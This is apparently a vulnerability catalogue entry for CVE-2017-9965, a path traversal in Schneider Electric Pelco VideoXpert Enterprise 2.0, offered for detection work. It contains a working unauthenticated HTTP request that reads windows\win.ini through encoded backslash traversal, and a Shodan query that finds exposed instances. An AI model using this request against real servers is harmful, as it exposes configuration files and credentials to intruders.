🔙 목록으로 돌아가기

CVE-2017-9965: Schneider Electric Pelco VideoXpert Enterprise 2.0 - Path Traversal

TitleSchneider Electric Pelco VideoXpert Enterprise 2.0 - Path Traversal
Author0x_akoko
SeverityMedium
ImpactUnauthenticated attackers can view web server files and directories, potentially exposing sensitive configuration files, credentials, and system information.
RemediationApply security updates provided by Schneider Electric or upgrade to a non-vulnerable version.
CVSS Score5.8
EPSS Score0.00211
CVE IDCVE-2017-9965
CWE IDCWE-22
Shodan Querytitle:"VideoXpert"
Tags cve cve2017 schneider pelco packetstorm lfi videoxpert vuln

🔍 Vulnerability Description

Schneider Electric Pelco VideoXpert Enterprise versions 2.0 and prior contain a directory traversal caused by insufficient input validation, letting unauthorized persons view web server files, exploit requires no authentication.

🌐 HTTP Request

GET /portal//..%5C%5C%5C..%5C%5C%5C..%5C%5C%5C..%5C%5C%5Cwindows%5Cwin.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-9965.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-9965.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A